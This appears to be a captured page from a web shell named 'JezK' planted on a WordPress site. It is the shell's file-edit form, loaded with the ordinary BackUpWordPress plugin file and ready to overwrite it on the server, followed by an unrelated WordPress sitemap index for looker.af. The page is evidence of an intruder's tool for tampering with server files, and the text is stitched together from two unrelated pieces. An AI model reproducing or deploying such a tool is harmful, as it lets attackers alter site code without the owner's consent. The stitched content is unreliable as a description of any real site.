
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: backupwordpress.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/*
Plugin Name: BackUpWordPress
Plugin URI: https://updraftplus.com/backupwordpress/?afref=744
Description: Simple automated backups of your WordPress powered website. Once activated you&#039;ll find me under &lt;strong&gt;Tools &amp;rarr; Backups&lt;/strong&gt;. On multisite, you&#039;ll find me under the Network Settings menu.
Version: 3.14
Author: XIBO Ltd
Author URI: https://profiles.wordpress.org/xibodevelopment
License: GPL-2+
License URI: http://www.gnu.org/licenses/gpl-2.0.txt
Text Domain: backupwordpress
Domain Path: /languages
Network: true
*/

/*
Copyright 2011 - 2018 XIBO Ltd

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

// Only load if &gt;= PHP 5.3


if ( ! defined( &#039;HMBKP_PLUGIN_PATH&#039; ) ) {
	define( &#039;HMBKP_PLUGIN_PATH&#039;, plugin_dir_path( __FILE__ ) );
}

if ( ! defined( &#039;HMBKP_BASENAME&#039; ) ) {
	define( &#039;HMBKP_BASENAME&#039;, plugin_basename( __FILE__ ) );
}

require_once( HMBKP_PLUGIN_PATH . &#039;classes/class-setup.php&#039; );

register_activation_hook( __FILE__, array( &#039;HMBKP_Setup&#039;, &#039;activate&#039; ) );
register_deactivation_hook( __FILE__, array( &#039;HMBKP_Setup&#039;, &#039;deactivate&#039; ) );

if ( HMBKP_Setup::meets_requirements() ) {
	require_once( HMBKP_PLUGIN_PATH . &#039;classes/class-plugin.php&#039; );
} else {
	add_action( &#039;admin_init&#039;, array( &#039;HMBKP_Setup&#039;, &#039;self_deactivate&#039; ) );
	add_action( &#039;all_admin_notices&#039;, array( &#039;HMBKP_Setup&#039;, &#039;display_admin_notices&#039; ) );
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
